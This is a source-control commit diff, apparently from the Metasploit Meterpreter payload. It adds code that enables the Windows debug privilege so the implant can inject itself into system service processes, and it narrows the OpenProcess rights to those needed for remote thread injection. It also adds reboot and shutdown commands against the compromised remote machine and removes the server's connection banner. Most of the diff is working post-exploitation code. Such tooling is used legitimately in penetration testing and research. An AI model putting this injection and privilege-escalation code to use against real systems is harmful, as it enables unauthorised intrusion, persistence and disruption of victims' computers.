migration now enables the debug privilege first so it can migrate to system services, added reboot/shutdown wrappers

git-svn-id: file:///home/svn/incoming/trunk@2834 4d416f70-5f16-0410-b530-b9f4589650da

external/source/meterpreter/source/common/base_dispatch.c

@@ -607,6 +607,8 @@ typedef struct _MigrationStubContext
 DWORD remote_request_core_migrate(Remote *remote, Packet *packet)
 {
 	MigrationStubContext context;
+	TOKEN_PRIVILEGES privs;
+	HANDLE token = NULL;
 	Packet *response = packet_create_response(packet);
 	HANDLE process = NULL;
 	HANDLE thread = NULL;
@@ -648,10 +650,30 @@ DWORD remote_request_core_migrate(Remote *remote, Packet *packet)
 	// Get the process identifier to inject into
 	pid = packet_get_tlv_value_uint(packet, TLV_TYPE_MIGRATE_PID);
 
+	// Try to enable the debug privilege so that we can migrate into system
+	// services if we're administrator.
+	if (OpenProcessToken(
+			GetCurrentProcess(),
+			TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,
+			&token))
+	{
+		privs.PrivilegeCount           = 1;
+		privs.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
+	
+		LookupPrivilegeValue(NULL, SE_DEBUG_NAME,
+				&privs.Privileges[0].Luid);
+	
+		AdjustTokenPrivileges(token, FALSE, &privs, 0, NULL, NULL);
+
+		CloseHandle(token);
+	}
+
 	do
 	{
 		// Open the process so that we can duplicate shit into it
-		if (!(process = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid)))
+		if (!(process = OpenProcess(
+				PROCESS_DUP_HANDLE | PROCESS_VM_OPERATION | 
+				PROCESS_VM_WRITE | PROCESS_CREATE_THREAD, FALSE, pid)))
 		{
 			result = GetLastError();
 			break;

external/source/meterpreter/source/server/metsrv.c

@@ -25,13 +25,6 @@ DWORD __declspec(dllexport) Init(SOCKET fd)
 			break;
 		}
 
-		// Send banner string
-		send_core_console_write(remote, 
-				"[ -=    connected to    =- ]\n"
-				"[ -= meterpreter server =- ]\n"
-				"[ -=    v.  %.8x    =- ]\n",
-				METSRV_VERSION_NUMBER);
-
 		// Register extension dispatch routines
 		register_dispatch_routines();
 

external/source/meterpreter/workspace/metsrv/metsrv.plg

@@ -6,6 +6,45 @@
 --------------------Configuration: metsrv - Win32 Release--------------------
 </h3>
 <h3>Command Lines</h3>
+Creating temporary file "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP105.tmp" with contents
+[
+/nologo /ML /W3 /GX /Zi /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "METSRV_EXPORTS" /Fp"Release/metsrv.pch" /Yu"metsrv.h" /Fo"Release/" /Fd"Release/" /FD /c 
+"Z:\external\source\meterpreter\source\server\libloader.c"
+"Z:\external\source\meterpreter\source\server\remote_dispatch.c"
+]
+Creating command line "cl.exe @C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP105.tmp" 
+Creating temporary file "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP106.tmp" with contents
+[
+/nologo /ML /W3 /GX /Zi /O2 /D "WIN32" /D "NDEBUG" /D "_WINDOWS" /D "_MBCS" /D "_USRDLL" /D "METSRV_EXPORTS" /Fp"Release/metsrv.pch" /Yc"metsrv.h" /Fo"Release/" /Fd"Release/" /FD /c 
+"Z:\external\source\meterpreter\source\server\metsrv.c"
+]
+Creating command line "cl.exe @C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP106.tmp" 
+Creating temporary file "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP107.tmp" with contents
+[
+common.lib ws2_32.lib kernel32.lib user32.lib gdi32.lib winspool.lib comdlg32.lib advapi32.lib shell32.lib ole32.lib oleaut32.lib uuid.lib odbc32.lib odbccp32.lib /nologo /dll /pdb:none /map:"Release/metsrv.map" /machine:I386 /def:"..\..\source\server\metsrv.def" /out:"Release/metsrv.dll" /implib:"Release/metsrv.lib" /libpath:"..\common\Release" 
+.\Release\libloader.obj
+.\Release\metsrv.obj
+.\Release\remote_dispatch.obj
+\external\source\meterpreter\workspace\common\Release\common.lib
+]
+Creating command line "link.exe @C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP107.tmp"
+<h3>Output Window</h3>
+Compiling...
+metsrv.c
+Compiling...
+libloader.c
+remote_dispatch.c
+Generating Code...
+Linking...
+   Creating library Release/metsrv.lib and object Release/metsrv.exp
+Creating temporary file "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP10B.bat" with contents
+[
+@echo off
+copy release\metsrv.dll ..\..\output\server
+]
+Creating command line "C:\DOCUME~1\mmiller\LOCALS~1\Temp\RSP10B.bat"
+
+        1 file(s) copied.
 
 
 

lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb

@@ -34,12 +34,14 @@ class Console::CommandDispatcher::Stdapi::Sys
 	#
 	def commands
 		{
-			"execute" => "Execute a command",
-			"getpid"  => "Get the current process identifier",
-			"getuid"  => "Get the user that the server is running as",
-			"kill"    => "Terminate a process",
-			"ps"      => "List running processes",
-			"sysinfo" => "Gets information about the remote system, such as OS",
+			"execute"  => "Execute a command",
+			"getpid"   => "Get the current process identifier",
+			"getuid"   => "Get the user that the server is running as",
+			"kill"     => "Terminate a process",
+			"ps"       => "List running processes",
+			"reboot"   => "Reboots the remote computer",
+			"sysinfo"  => "Gets information about the remote system, such as OS",
+			"shutdown" => "Shuts down the remote computer",
 		}
 	end
 
@@ -175,6 +177,15 @@ class Console::CommandDispatcher::Stdapi::Sys
 		return true
 	end
 
+	#
+	# Reboots the remote computer.
+	#
+	def cmd_reboot(*args)
+		print_line("Rebooting...")
+
+		client.sys.power.reboot
+	end
+
 	#
 	# Displays information about the remote system.
 	#
@@ -187,6 +198,15 @@ class Console::CommandDispatcher::Stdapi::Sys
 		return true
 	end
 
+	#
+	# Shuts down the remote computer.
+	#
+	def cmd_shutdown(*args)
+		print_line("Shutting down...")
+
+		client.sys.power.shutdown
+	end
+
 end
 
 end